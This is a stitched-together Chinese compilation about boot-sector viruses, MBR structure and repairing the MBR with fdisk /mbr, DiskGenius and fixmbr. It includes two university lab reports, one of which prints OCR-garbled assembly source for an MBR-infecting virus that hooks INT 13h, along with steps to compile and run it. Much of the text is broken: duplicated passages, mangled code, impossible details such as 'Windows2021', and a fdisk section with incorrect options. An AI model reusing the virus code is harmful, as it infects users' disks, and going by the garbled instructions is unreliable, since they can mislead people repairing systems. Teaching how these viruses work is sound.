引导型病毒的原理与FDISKMBR的正确使用

引导型计算机病毒的机理和解析摘要：引导型病毒是什么，其技术发展，优缺点，特点以及来源，引导型病毒的机制，解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构，并提出引导型病毒的检测和防治方法。

关键词：引导区硬盘内存新型引导型病毒病毒结构防治计算机病毒是指在计算机程序中插入的破坏计算机功能或数据，影响计算机使用并且能够自我复制的一组计算机指令或程序代码。

计算机病毒具有3个基本特性：感染性、潜伏性和表现性。

换句话来说计算机病毒是人为的特制程序或指令程序，具有自我复制能力，并有一定的潜伏性、特定的触发性和很大的破坏性。

计算机病毒的种类繁多，按感染方式分为：引导型病毒、文件感染病毒和混合型病毒。

引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区，如大麻、火炬、BREAK等病毒。

1 引导型病毒1.1 简介引导型病毒寄生在主引导区、引导区，病毒利用操作系统的引导模块放在某个固定的位置，并且控制权的转交方式是以物理位置为依据，而不是以引导型病毒寄生在主引导区、引导区，病毒利用操作系统的引导模块放在某个固定的位置，并且控制权的转交方式是以物理位置为依据，而不是以操作系统引导区的内容为依据，因而病毒占据该物理位置即可获得控制权，而将真正的引导区内容搬家转移，待病毒程序执行后，将控制权交给真正的引导区内容，使得这个带病毒的系统看似正常运转，而病毒已隐藏在系统中并伺机传染、发作。

引导型病毒进入系统，一定要通过启动过程。

在无病毒环境下使用的软盘或硬盘，即使它已感染引导区病毒，也不会进入系统并进行传染，但是，只要用感染引导区病毒的磁盘引导系统，就会使病毒程序进入内存，形成病毒环境。

1.2 计算机启动过程在分析引导型病毒之前，必须清楚正常的系统启动过程。

上电或复位后，ROM_BIOS的初始化程序完成相应的硬件诊断，并设置ROM_BIOS中断和参数，调用INT19H自举。

注意ROM_BIOS初始化程序已设置了BIOS中断。

mbr的原理MBR（Master Boot Record，主引导记录）是位于计算机硬盘的第一个扇区的512字节空间，它存储着引导计算机操作系统的信息。

MBR 的原理是一个相对简单的引导过程，它涉及到硬盘的分区表、引导加载程序以及操作系统的启动。

MBR包含了硬盘的分区表，用于记录硬盘上的分区信息。

分区是指将硬盘划分成不同的逻辑部分，每个分区可以装载一个操作系统。

分区表记录了每个分区的起始位置、大小以及分区的属性信息。

通过分区表，计算机可以识别硬盘上的其他分区，并找到要引导的操作系统所在的分区。

MBR包含了引导加载程序（boot loader），也称为主引导记录指针。

这是一个非常重要的组件，它位于MBR的前446个字节内。

引导加载程序的作用是加载操作系统，并将控制权交给操作系统的内核。

引导加载程序首先执行硬件自检（POST）来检测计算机硬件的状态，然后开始加载操作系统。

它会根据分区表中的信息选择要加载的分区，并读取该分区的引导扇区。

引导扇区由操作系统的引导代码（boot code）组成，它包含了操作系统的核心功能。

MBR的引导加载程序会将控制权交给操作系统的引导代码。

操作系统的引导代码会进一步初始化系统环境并加载操作系统的内核文件。

内核文件是操作系统的核心部分，包含了操作系统的主要功能和驱动程序。

总结起来，MBR的原理就是通过分区表和引导加载程序来引导计算机加载操作系统。

MBR的分区表记录了硬盘上不同分区的信息，引导加载程序负责选择要加载的分区并加载操作系统的引导代码。

最终，操作系统的引导代码会进一步加载操作系统的内核文件，让计算机正常启动并运行。

需要注意的是，MBR仅适用于传统的BIOS（Basic Input/Output System）系统，而现代的计算机普遍采用UEFI（Unified Extensible Firmware Interface）固件，其中引入了新的引导机制。

UEFI使用GPT（GUID Partition Table）分区表取代了MBR的分区表，而引导加载程序也有所不同。

1、主要特征：桌面上出现几个删除不了的图标，其通过右键无法删除，使用工具删除清理后重复出现。

2、隐含特征：这是一个引导型病毒，病毒会在感染初期就修改PC系统的硬盘主引导模块[主MBR]，这样它就先于Windows系统启动而进入内存，病毒有一部分存在于硬盘的空闲扇区中，当引导程序激活它以后，用户即使重新安装系统也会在第一次启动时就被重复感染。

3、感染机系统在空闲时进程中多出一些未知的程序，并且伪装成与系统类似的名称比如wupmgr.exe，svchost.exe[不好分别]。

4、感染机系统各分区根目录下，全部的目录及程序可能都被隐藏并出现伪装的替代同名程序，辨别方法是资源管理器显示详细信息，其目录图标伪装的程序，分类不是文件夹。

清除建议：
1、应首先重置硬盘的主引导记录MBR，使用光盘，U盘或移动硬盘启动，利用其所带磁盘工具，将主机的硬盘MBR还原为标准MBR。

还原完不要启机进入系统防止重复感染。

2、立刻重装系统，或者重G系统，如果有还原备份的话，可以通过光盘、U盘、移动硬盘运行Ghost主程序来还原主机系统。

3、建议在WinPE工具环境下，整理主机各分区根目录，辨别删除病毒体伪装的文件，特征是其文件的生成时间都是同一时刻[也就是此机被感染时间]，大小相同，图标为文件夹类似黄SE，名称为原目录名同名。

4、正确重新做好系统后，进入桌面不要查看我的电脑，或者资源管理器中的任何文件[病毒体可能在其它分区中易被激活]，请在第一时间配置好上网程序，下载安装杀毒软件，并且打全所有系统漏洞补丁。

然后让杀毒软件查杀各分区，确保病毒被清除。

引导型病毒原理病毒能感染的只有可执⾏代码，在电脑中可执⾏代码只有引导程序和可执⾏⽂件，当然，还有⼀类特殊的病毒，如WORD宏病毒，当然宏也是可执⾏代码。

病毒感染BIOS 也是有可能的，不过并⽆太⼤意义，因为，现在的FLASHROM的BIOS都是可以写保护的，再说，万⼀出事，⽤⽆毒的再写⼀遍即可。

所以，⼀般将病毒分为引导型，⽂件型，或是混合型。

想要了解引导型病毒的原理，⾸先要了解引导区的结构。

软盘只有⼀个引导区，称为DOS BOOT SECTER ，只要软盘已格式化，就已存在。

其作⽤为查找盘上有⽆IO.SYS DOS.SYS,若有则引导，若⽆则显⽰‘NO SYSTEM DISK...'等信息。

硬盘有两个引导区，在0⾯0道1扇区的称为主引导区，内有主引导程序和分区表，主引导程序查找激活分区，该分区的第⼀个扇区即为DOS BOOT SECTER。

绝⼤多数病毒感染硬盘主引导扇区和软盘 DOS引导扇区。

下⾯给出基本引导病毒的原理图： 带毒硬盘引导------>BIOS将硬盘主引导区读到内存0:7C00处控制权转到主引导程序(这是千古不变的)(病毒)-------->将0:413单元的值减少1K 或nK------->计算可⽤内存⾼段地址将病毒移到⾼段继续执⾏-------->修改INT13地址,指向病毒传染段,将原INT13地址保存在某⼀单元----- ->病毒任务完成,将原引导区调⼊0:7C00执⾏------>机器正常引导 带毒软盘引导----->判断硬盘是否有毒,若⽆毒则传染------>以下同上(传染时将病毒写⼊主引导扇区,将原引导程序存⼊某⼀扇区) 以上是引导型病毒的基本框图,不论是最古⽼,还是最新的,万变不离其中.只不过在各细节个⼈的技巧不同罢了。

驻留内存:⼀般采取修改0:413地址的⽅法,因为引导时,DOS还未加载这是唯⼀的⽅法,但有很⼤的缺点,启动后⽤MEM查看发现常规内存的总量少于640K,不够隐蔽,当然有办法解决,可以修改INT 8,检测INT 21是否建⽴,若建⽴则可采⽤DOS功能驻留内存.详细见⽂件型病毒。

简便快速清除硬盘引导型病毒—兼谈FDISK／MBR参数邵火原
【期刊名称】《电脑》
【年(卷),期】1995(000)006
【摘要】有了病毒才有了反病毒软件,而有了反病毒措施,又有了隐蔽更深、破环性更强的病毒.这就像人们常说的“道高一尺,魔高一丈”.就目前问世的防病毒软件、卡,也只能够消除到目前已经发现的病毒和未知的引导型病毒.而病毒正向深层次,高水平发展.由于DOS系统的硬盘是开放性的,也易于让病毒侵蚀,硬盘是病毒的栖息地和繁殖地.对于不熟悉硬盘结构和DEBUG使用方法的普通用户,要清除硬盘上的病毒是非常困难的.
【总页数】1页(P38)
【作者】邵火原
【作者单位】无
【正文语种】中文
【中图分类】TP309
【相关文献】
1.Fdisk的一个不寻常的参数"/mbr" [J], 张旭东
2.硬盘系统引导型病毒快速清除的通用方法 [J], 徐秀权
3.利用DOS的FDISK命令清除硬盘主引导区寄生型病毒 [J], 郭玉堂
4.巧用FDISK命令消除硬盘引导型病毒 [J], 李增军;尹志英
5.不丢失原有数据用FDISK重建硬盘MBR [J], 肖芳惠
因版权原因，仅展示原文概要，查看原文内容请购买。

《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。

计算机病毒(Computer Virus)，是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。

计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。

2. 计算机病毒有哪些分类方法？根据每种分类方法，试举出一到两个病毒。

3. 为什么同一个病毒会有多个不同的名称？如何通过病毒的名称识别病毒的类型？国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”，即三元组命名规则。

1、系统病毒系统病毒的前缀为：Win32、PE、Win95、W32、W95等。

2、蠕虫病毒蠕虫病毒的前缀是：Worm。

3、木马病毒、黑客病毒木马病毒其前缀是：Trojan，黑客病毒前缀名一般为Hack 。

4、脚本病毒脚本病毒的前缀是：Script。

5、宏病毒其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro。

6、后门病毒后门病毒的前缀是：Backdoor。

7、病毒种植程序病毒后门病毒的前缀是：Dropper。

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。

8．破坏性程序病毒破坏性程序病毒的前缀是：Harm。

这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。

9．玩笑病毒玩笑病毒的前缀是：Joke。

10．捆绑机病毒捆绑机病毒的前缀是：Binder。

4. 简述计算机病毒产生的背景。

5. 计算机病毒有哪些传播途径？传播途径有两种，一种是通过网络传播，一种是通过硬件设备传播（软盘、U盘、光盘、硬盘、存储卡等）。

网络传播，又分为因特网传播和局域网传播两种。

硬件设备传播：通过不可移动的计算机硬件设备传播、通过移动存储设备传播、通过无线设备传播。

fdisk mbr用法摘要：1.fdisk mbr 简介2.fdisk mbr 用法详解3.使用fdisk mbr 的注意事项4.结论正文：【1.fdisk mbr 简介】fdisk mbr 是一款用于创建和管理磁盘分区的Linux 命令行工具。

其中，fdisk 代表的是"floppy disk"，即软盘的意思，而mbr 则指的是主引导记录（Master Boot Record），是计算机启动时加载的第一个扇区的记录。

通过使用fdisk mbr，用户可以在磁盘上创建、删除和修改分区，同时也可以对分区进行格式化。

【2.fdisk mbr 用法详解】fdisk mbr 的基本用法如下：```fdisk [选项] [磁盘设备名称]```常见的选项有：- -l：列出磁盘分区信息- -m：创建新的分区- -d：删除分区- -a：更改分区属性- -p：打印分区表- -w：写入磁盘使用fdisk mbr 时，用户需要先选择要操作的磁盘设备，例如/dev/sda 或/dev/sdb。

接下来，根据需要对分区进行操作，例如创建新分区、删除分区或修改分区属性等。

最后，使用-w 选项将更改写入磁盘。

【3.使用fdisk mbr 的注意事项】在使用fdisk mbr 时，需要注意以下几点：- 在操作前，请确保备份好重要数据，以免误操作造成数据丢失。

- 在创建新的分区时，需要指定分区类型（如主分区、扩展分区或逻辑分区）、分区编号和分区大小。

分区编号从1 开始，不能与已有分区编号冲突。

- 在删除分区时，需要先删除逻辑分区，然后再删除扩展分区。

- 在修改分区属性时，可以更改分区类型、大小和挂载点等信息。

【4.结论】fdisk mbr 是一款实用的磁盘分区管理工具，用户可以通过它轻松地对磁盘分区进行创建、删除和修改等操作。

但同时，使用fdisk mbr 也需要谨慎，以免误操作导致数据丢失。

利用DiskGenius重建MBR清除引导区病毒
DiskGenius是一款磁盘分区及数据恢复软件。

支持对GPT磁盘(使用GUID分区表)的分区操作。

除具备基本的分区建立、删除、格式化等磁盘管理功能外，还提供了强大的已丢失分区搜索功能、误删除文件恢复、误格式化及分区被破坏后的文件恢复功能、分区镜像备份与还原功能、分区复制、硬盘复制功能、快速分区功能、整数分区功能、分区表错误检查与修复功能、坏道检测与修复功能。

提供基于磁盘扇区的文件读写功能。

支持VMware、Virtual PC、VirtualBox虚拟硬盘格式。

支持IDE、SCSI、SATA等各种类型的硬盘。

支持U 盘、USB硬盘、存储卡(闪存卡)。

支持FAT12/FAT16/FAT32/NTFS/EXT3文件系统。

下载地址：/content/3928.html
具体操作步骤：
运行DiskGenius程序，点击“硬盘- 重建主引导记录(重建MBR)”菜单项，程序弹出下列提示：
点击“是”按钮后，程序将用软件自带的MBR重建主引导记录。

MBR重建主引导记录后，隐藏在主引导区的病毒就会被彻底清除了。

注意：软件自带的MBR是Windows XP 系统的。

非Windows XP 重建MBR后，需要如
果不能启动系统可以用NTBootAutofix这个软件来修复。

恢复过程需要光盘或U盘启动PE系统。

引导型病毒是一种在ROM BIOS之后，系统引导时出现的病毒，它先于操作系统，依托的环境是BIOS中断服务程序。

引导型病毒是利用操作系统的引导模块放在某个固定的位置，并且控制权的转交方式是以物理位置为依据，而不是以操作系统引导区的内容为依据，因而病毒占据该物理位置即可获得控制权，而将真正的引导区内容搬家转移或替换，待病毒程序执行后，将控制权交给真正的引导区内容，使得这个带病毒的系统看似正常运转，而病毒已隐藏在系统中并伺机传染、发作。

引导区病毒的传播方式：下面主要说一下目前传播最为广泛的引导区病毒WYX。

这个病毒传播的唯一途径就是使用感染有该病毒的启动盘（包含可启动的光盘）启动计算机。

如果只是读取感染有引导区病毒的软盘或者光盘上的文件是不会被感染。

如果你的机器已经感染该病毒，并且病毒驻留了内存，则你的软盘如果没有写保护的话很容易被感染。

WYX病毒的清除：当你的杀毒软件查出了机器感染了WYX的时候请不要惊慌，先要看清楚该文件的感染位置。

如果病毒是在SUHDLOG.DAT或SUHDLOG.BAK文件中，那么直接删除即可。

其实，这是硬盘引导区先染上了引导区病毒，以后在安装WINDOWS系统时，没有先查杀病毒，直接就安装了WINDOWS系统。

所以，WINDOWS先将引导区做了一个文件形式的备份，文件SUHDLOG.DAT 就是其备份，该文件以隐含的形式存放在WINDOWS系统根目录下，由于该引导型病毒存在文件中，没有作用，所以可以直接删除。

如果病毒只是存在于移动存储设备（如软盘、闪存盘、移动硬盘）上，就可以借助本地硬盘上的反病毒软件直接进行查杀，或者干脆把移动存储设备上的文件备份到硬盘上，然后重新格式化掉移动存储设备，再把文件复制回去。

如果病毒确实是在硬盘的引导区上，也不用怕，这类病毒的清除方法很简单，针对不同的操作系统有不同的清除方法，一般可以不依靠杀毒软件。

不过在清除之前一定要备份原来的引导区，特别是原来装有别的操作系统的情况，如日文Windows、Linux等。

XI`AN TECHNOLOGICAL UNIVERSITY实验报告实验课程名称引导区病毒一．实验目的1.了解系统启动过程2.学习实模式下DEBUG命令的相关操作3.了解引导区病毒的基本原理4.学会如何修复引导区二．实验原理一．引导型病毒定义引导型病毒，也叫开机型病毒，主要感染计算机主引导扇区和引导扇区的一类计算机病毒；其中，感染主引导扇区的病毒称作MBR病毒，感染引导区的病毒称为BR病毒。

二．计算机的启动过程在计算机系统启动时，BIOS加电自检及设备初始化成功后，BIOS将启动盘的0磁道，0柱面，1扇区的主引导记录（MBR）加载到内存物理地址0000：7C00（文档中的内存地址均采用16进制表示），并检查物理地址0000：7DFE处的字是否为0xAA55（引导区有效标记），若不相等给出“No Rom BASIC”提示，然后死机，若相等执行主引导程序，主引导记录（MBR）先将自己复制到内存的其他地方以让出0：7C00处的512B的空间，然后在主分区表中搜索标志为0x80（分区已被激活，0则表示未被激活）的激活分区，如发现没有或有多个激活分区，则提示“Invalid partition table”，并停止，否则将激活分区的第一个扇区（即系统引导扇区DBR）读入内存物理地址0000：7C00，并查找物理地址0000：7DFE处的字是否等于0xAA55，若不等于，则显示“Missing Operating System”然后停止，否则继续执行操作引导程序，引导计算机进入操作系统，完成整个引导过程。

三．中断中断就是CPU暂停当前程序的执行，转而执行处理紧急事物的程序，并在该事物处理结束后能自动恢复执行原先程序的过程，在此，称引起紧急事物的事件为中断源，称处理紧急事件的程序为中断服务程序或中断管理程序。

中断的分类很多，按触发的原因，有硬中断和软中断之分。

硬中断有实际的硬件事件引起，例如，除以零、算术溢出、按下键盘键等；软中断是因程序执行了计算机的INT指令造成的，例如，INT 21H将执行21H中断，这里21H称作中断号，其中“H”表示该数据为16进制。

引导型病毒实验【实验环境】Windows实验台实验工具：、masm5、WinHe【实验内容】查看并备份MBR编译并运行引导区病毒程序去除主引导区病毒引导型病毒实验【实验原理】一、主引导扇区主引导扇区是硬盘的第一个扇区〔0柱面0磁头1扇区〕，由主引导记录〔MBR〕、主分区表即磁盘分区表〔Dbr可以重建标准的主引导记录程序。

主引导扇区的具体内容为：br 命令修复MBR 、去除病毒，但容易造成主分区信息丧失等问题。

通常许多杀毒软件在制作“应急盘〞时，备份主引导扇区/引导扇区，在去除引导性病毒式，只需将备份内容写回相应的扇区即可。

本实验将提供主引导区病毒源码，编译并运行病毒程序；使用分区工具备份和恢复主引导区。

引导型病毒实验【实验步骤】一、 查看主引导扇区翻开Windows 实验台，在启动选项中选择进入Windows2021系统；翻开WinHe 工具，点击菜单项“工具|磁盘编辑器〞，翻开磁盘编辑器，选择“物理媒介-HD0〞，如图和图所示；点击“是〞，即可查看第一块硬盘的具体内容，如下图，其中第一个扇区即为主引导扇区。

图选择“磁盘编辑器〞图选择HD0图主引导扇区二、备份主引导扇区重新启动系统，在启动选项中选择进入MaDos ，如下图选择“运行MaDos 〞，回车；密码为空，直接回车进入如下图的界面，选择“工具箱〞，回车。

图 MaDos启动选项，选择“运行MaDos 〞图 MaDos首菜单，选择“MaDos工具箱〞进入DOS系统界面，使用aefdis工具对MBR进行备份，如下图。

图备份MBR三、编译并运行主引导区病毒程序输入如图和图所示的命令，编译并运行主引导区病毒源码。

图编译病毒源码图连接生成ee并运行的具体内容与分析如下：;引导区病毒样例286model smallcode;程序入口参数;a=内存高端地址 b=7c00h 引导程序起始地址;c=0001h 表示从ch00磁道cl01扇区读出了本程序;d=00/80h 表示从d00:A驱80:C驱读出了本程序;ds=es=ss=cs=0 初始段值OFF equ <Offset>VirusSie=OFF @@End-OFF @@Start@@Start:jmov b,7c00hmov sov a,ds: ;得到内存大小0:413h单元存有以K计数的内存大小dec adec amov ds:,a ;将原内存大小减2Kmov cl,06shl a,cl ;计算高端内存地址mov es,aor di,dimov si,sov c,VirusSiecldreovsb ;把病毒搬移到高端地址里ov di,OFF @@HighAddrov cs:,amov a,OFF @@NewInt13chg ds:,amov cs:,a ;修改中断13hov dl,80hcall @@Oov a,02021mov c,79*100h17 ;传染时将原引导程序保存在0面79道17扇区中mov dh,00hcall @@CallInt13jc short @@ReadOldFloov ah,02hint 1ah ;取系统时间cmov al,cs:inc simov ah,0ehint 10h ;显示al中的字符or al,aljn @@Disov c,0001h ;恢复c初值ov a,02021mov c,0002h ;传染时将原硬盘主引导程序保存在0面0道2扇区中mov dh,00hcall @@CallInt13 ;读出jc short @@ReadOldHardBoot ;失败，继续读直到成功jmov b,OFF OldBootSov a,02021mov c,0001hmov dh,00hcall @@CallInt13 ;读原引导扇区jc short @@Oov di,bcmov c,0002h ;假设是硬盘，保存在0面0道2扇区jmov c,79*100h17 ;假设是软盘，保存在0面79道17扇区@@SaveOldBoot:mov a,0301hmov dh,0hcall @@CallInt13 ;保存原引导扇区jc short @@Oov si,OFF @@Startcldmovswmovsb ;修改原扇区首指令〔Jmov di,OFF@@Begin2021mov si,OFF @@Beginmov c,OFF @@End-OFF @@Begincldreovsb ;修改原引导扇区指令c字节mov a,0301hmov c,0001hmov dh,00hcall @@CallInt13 ;写回已经被修改了的引导程序@@Oust go sleeov ds,aclimov a,ds:mov cs:,amov a,ds:mov cs:,amov dl,80hcall @@Oov a,4c00hint 21hEnd @@Install四、病毒感染病症与分析运行后，重新启动系统，首先看到如下图的界面，回车即可进入正常的启动选项；选择进入Win2021，翻开WinHe工具，可以看到主引导扇区已被修改，原主引导扇区的内容已被病毒备份到第二个扇区，如下图。

fdiskmbr命令是什么，主引导区是什么？可以重写主引导区的引导程序，主引导区是硬盘最前⾯的⼀个区域，硬盘要正确要引导操作系统成功所必备的，它主要包括三个内容，⼀是引导程序，⼆是分区信息（就是电脑的C、D、E。

开始结束等信息了），三是结束标志55AA。

⼀般来讲，这三个内容对于多数硬盘来讲只有第⼆项是根据⽤户⾃⾝的配置来决定的，不⼀样了。

担第⼀项和第三项是⼀样的，⽽FDISK/MBR是重写第⼀部分的内容来解决由于引导程序错误引起的故障了。

“使⽤FDISK/MBR命令来修复主引导区”的具体操作是怎样啊?在命令⾏⾥操作的。

⾸先得安装包含fdisk的DOS命令集，再运⾏"CMD",在包含fdisk的的⽬录下，输⼊“fdisk/mbr”.不⽤fdisk/mbr命令也能修复磁盘引导区的⽅法，最好是PE下的图形化界⾯他说是AMI的BIOS，他找不到调节软驱的选项在哪⾥，每次开机都要按⼀个键才能进系统我去⼀看果然是要按F1，不过真正难搞的东东是下⾯的E⽂提⽰，每次开机都要按⼀个键才能进系统，虽然不是什么严重问题，但也不是正常现象吧。

Err5:Error findingVFLOPPY.SYSErr8:Fake Floppy diver not foundPress any key:从未见过这样的提⽰，上⽹⼀查VFLOPPY.SYS原来是什么虚拟软驱分析问题，你说硬盘是320G的，那么这台电脑应该没买多长时间，可以排除主板电池电量低的问题，如果是隐藏分区或者软件的问题，建议还是将数据保存后重新分区，把隐藏分区去掉，即使数据很多，说实话，⼥孩⼦⽆⾮就是存了⼀些韩剧什么的，⼤都可以再下载的，你只需要询问最重要的数据都有哪些并保存出来就可以了。

重新分区装完系统之后做⼀个备份ghost ⽂件，以备以后使⽤。

XP系统怎么使⽤Fdisk /mbr修复硬盘的主引导区的引导程序98光盘启动⾄纯DOS下，命令提⽰符下直接敲Fdisk/mbr回车就可以。

实验一引导型病毒实验1. 实验目的通过实验，了解引导区病毒的感染对象和感染特征，重点学习引导病毒的感染机制和恢复感染染毒文件的方法，提高汇编语言的使用能力。

2. 实验内容本实验需要完成的内容如下：引导阶段病毒由软盘感染硬盘实验。

通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制；阅读和分析病毒的代码。

DOS运行时病毒由硬盘感染软盘的实现.通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制;阅读和分析病毒的代码。

3。

实验环境VMWare Workstation 5。

5.3MS—DOS 7。

104。

实验步骤与结果第一步：1、打开VMware Workstation,新建虚拟机，过程如下：然后点next，点NEXT, 硬盘大小可自行分配，大概1G左右就ok，一直到完成为止。

第二步：1．安装MYDOS2．启动虚拟机电源，自动从虚拟软驱进入安装过程，一路点NEXT，AGREE到为虚拟机系统生成一块fat32的硬盘区，点击，然后reboot。

3．再次进入安装引导过程，一路点NEXT，AGREE到重写MBR 选yes,而后选择安装目录C：\dos71目录。

在选择DOS commands only安装.并取消DOS add —on的安装复选项。

然后一路点NEXT，AGREE。

选择enable umb memory在下一个页面里选择load both cd/dvd 和IDE/ATAPI第三步：步骤如课本实验一1．运行虚拟机，检查目前虚拟硬盘是否含有病毒。

2．将virus。

img加入软驱，运行虚拟机：3、删除虚拟软盘，通过硬盘引导按任意键进入DOS系统4、通过命令format A：/q 快速格式化软盘。

5、软驱中加入empty。

img引导。

如下:5. 病毒代码分析i。

传染模块主要代码及传染过程说明；inc cx ;cx此时为1，为2mov ds:[si+offset reg_cx],cxmov ax，0301h ；写入一个扇区mov dx，0080h ；写入硬盘1的0面int 13h ;开始写入jb boot_dos ;不成功转到boot_dosmov cl, 21h ;准备搬移33个字mov di，01beh ;从内存高端的03beh搬移到mov si，03beh ；内存高端的01beh，此处正是病毒程序的驻留区rep movsw ；开始搬移mov ax，0301h ；准备向硬盘写入一个扇区xor bx, bxinc cx ；cx置1int 13h ；写入物理硬盘0面0道1扇区call near ptr install ；安装病毒的int 13hmov dx，0080h ；读硬盘0headint 13h ；开始读取//*** 读取正常的引导扇区,以备安装病毒的int 13h 后正常启动call near ptr install传染过程说明：先判断机器从哪里启动，如是从硬盘启动，直接安装病毒到int 13h,通过int 13h 感染软盘。

Win7 启动修复Fdisk命令1.windows命令行fixmbr [device_name(驱动器盘符)]是重新写入一个mbr fixboot2.dos下fdisk /mbr3.删除linux分区后，启动不了grup>rootnoverify(hd0,0)chainloader+1boot或root(hd0,0)4.进入xp后运行clsmbr.exe清楚mbr5.若连grub都启动不了，进入dos下fdisk/mbr6.重装xp后,grub-install/dev/hda安装故障恢复控制台d:i386/winnt32.exe/cmd cons，其中d是CD-ROM驱动器的驱动器号2、用Fdisk命令修复Fdisk不仅是一个分区程序，它还有着非常便捷的恢复主引导扇区功能，而且它只修改主引导扇区，对其他扇区并不进行写操作，因此对于那些还在使用Windows9x的朋友而言无疑是个非常理想的分区表修复工具。

通过Fdisk修复主引导区的时候，先用Windows98启动盘启动系统，在提示符下输入“Fdisk/mar”命令即可覆盖主引导区记录。

提示:“Fdisk /mar”命令只是恢复主分区表，并不会对它重新构建，因此只适用于主引导区记录被引导区型病毒破坏或主引导记录代码丢失，但主分区表并未损坏的情况使用。

而且这个命令并不适用于清除所有引导型病毒，因此使用的时候需要注意。

对硬盘第一分区为ntfs的情况，fdisk /mbr一直是一种误导性的解决办法3、用Fixmbr修复引导记录在Windows2000/XP中，我们一般会用到故障恢复控制台集成的一些增强命令，比如Fixmbr用于修复和替换指定驱动器的主引导记录、Fixboot用于修复知道驱动器的引导扇区、Diskpart能够增加或者删除硬盘中的分区、Expand可以从指定的CAB源文件中提取出丢失的文件、Listsvc可以创建一个服务列表并显示出服务当前的启动状态、Disable和Enable分别用于禁止和允许一项服务或者硬件设备等等，而且输入“help”命令可以查看到所有的控制命令以及命令的详细解释。

fdisk mbr用法fdisk mbr是一个DOS LINUX命令，重写硬盘主引导区，注意中间有个空格。

fdisk mbr用法如下：1、主引导程序受损此乃常见故障，硬盘不能自检，微机死锁，或显示boot failure－insert system diskette，……之类；经由软盘引导，fdisk 命令能列出分区信息。

取硬盘同版本dos 软盘或应急盘引导，运行a>fdisk /mbr 命令，仅向主引导扇区写入当前系统固有的主引导程序，硬盘即恢复自举能力，如果dos 引导信息及系统文件等均正常。

2、清除嵌入式主引导型病毒此类病毒常见，它们仅以先导模块嵌入主引导程序，不触动分区表及检验标志。

首选以检出此类病毒的软件清除。

遇杀毒软件不效, 简洁高效的对策是以硬盘同版本dos 软盘引导，运行a>fdisk /mbr 命令，向硬盘单一地写入当前系统固有的主引导程序，病毒“先导”模块被覆盖，分藏它处的残部随之丧失作用。

顺及，以常规fdisk 命令进行分区，难能清除此类病毒，原因是当它读得检验标志完好，自动逾越主引导程序写操作，仅登录分区表，病貌依旧! 硬盘格式化后不能自举。

行之有效的措施是运行a>fdisk /mbr命令。

早年曾出于无奈而动用物理格式化程序，稍后方悟悉硬盘经初始化，碍事的检验标志不复存在。

3、仅设基本dos 分区硬盘的主引导信息全损前述表现之外，执行a>c:，显示invalid drive specification，乃分区表破坏；fdisk 命令不能列出分区信息。

实践中曾遇两例原仅设基本dos 分区的硬盘(无扩展dos分区)，主引导扇区面目皆非，经分别运行原用的ms dos 7.0 及7.1 fdisk /mbr 命令，常规重写全套完全适用的主引导信息，由于其dos 引导信息、文件分配表、根目录及用户数据完好，c 盘均迅即康复。

(常规fdisk 命令初始化dos 引导扇区等，有需后续处理)4、清除lilo 信息在以系统自带的linux load 过程中，每修改主引导信息，籍以引导linux。